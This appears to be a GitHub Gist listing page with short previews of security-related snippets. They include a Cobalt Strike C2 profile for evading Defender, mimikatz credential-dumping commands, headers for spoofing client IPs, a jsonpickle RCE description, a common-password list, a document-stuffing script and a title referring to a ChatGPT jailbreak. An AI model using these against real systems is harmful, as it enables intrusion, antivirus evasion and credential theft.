coolaj86
/ ChatGPT-Dan-Jailbreak.md
Last active
June 1, 2024 06:19
miticollo
/ How-to-build-frida-server-for-ios.md
Last active
May 25, 2024 06:20
How to build frida server for iOS jailbroken devices
Here, I'll show you how to compile Frida for both rootfull and rootless jailbreaks.
On Dopamine/Fugu15 Max or palera1n you can add my repo (open the link in your favorite browser on your jailbroken iDevice).
The DEBs you will install are build using the following instructions.
tothi
/ minimal-defender-bypass.profile
Last active
May 5, 2024 01:05
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
| # as stage0, remote injecting a thread into a suspended process works | |
| set host_stage "false"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
| set sleeptime "10000"; | |
| stage { | |
| set allocator "MapViewOfFile"; | |
| set name "notevil.dll"; |
kaimi-
/ gist:6b3c99538dce9e3d29ad647b325007c1
Last active
May 2, 2024 08:29
Possible IP Bypass HTTP Headers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |
j0lt-github
/ jsonpickle_vulnerable.txt
Last active
August 7, 2021 13:00
jsonpickle 1.4.2 vulnerable to RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: JsonPickle 1.4.2 allows remote code execution during deserialization of a malicious payload through the decode() function. | |
| VulnerabilityType: CWE-502: Deserialization of Untrusted Data | |
| Vendor of Product: https://github.com/jsonpickle/jsonpickle | |
| Affected Product Code Base: JsonPickle Python Module | |
| Attack Type: Remote | |
| Impact Code execution : True |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
claui
/ install_jtool2.sh
Last active
May 26, 2024 10:18
How to install Jonathan Levin’s jtool2 on macOS 11.0 (Apple Silicon)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copy and paste the following snippet, including brackets, into the Terminal | |
| ( | |
| set -e; | |
| cd "$(mktemp -d)" | |
| curl -LO 'http://www.newosxbook.com/tools/jtool2.tgz' | |
| tar -x -f jtool2.tgz | |
| lipo jtool2 -thin x86_64 -output jtool2.x86_64 | |
| lipo disarm -thin x86_64 -output disarm.x86_64 | |
| sudo mkdir -p /usr/local/bin |
ignis-sec
/ bb-foxyproxy-pattern.json
Created
June 24, 2020 09:06
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
ignis-sec
/ ignis-top-100-most-common.txt
Created
June 21, 2020 08:19
Top 100 most common passwords from old public db leaks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Password | Occurrence | |
| _____________|____________ | |
| 123456 |5377325 | |
| 123456789 |1962160 | |
| password |1190534 | |
| qwerty |869629 | |
| 12345678 |703220 | |
| 12345 |679886 | |
| 123123 |460430 | |
| 1234 |448199 |
keyboardcrunch
/ pydocexec.py
Created
April 30, 2020 02:24
Injects a python script inside a word document so the doc can be executed with python :)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import sys | |
| import os | |
| import zipfile | |
| import tempfile | |
| from xml.etree import ElementTree | |
| from shutil import copyfile | |
| def stuffer(py_file, doc_file): |
NewerOlder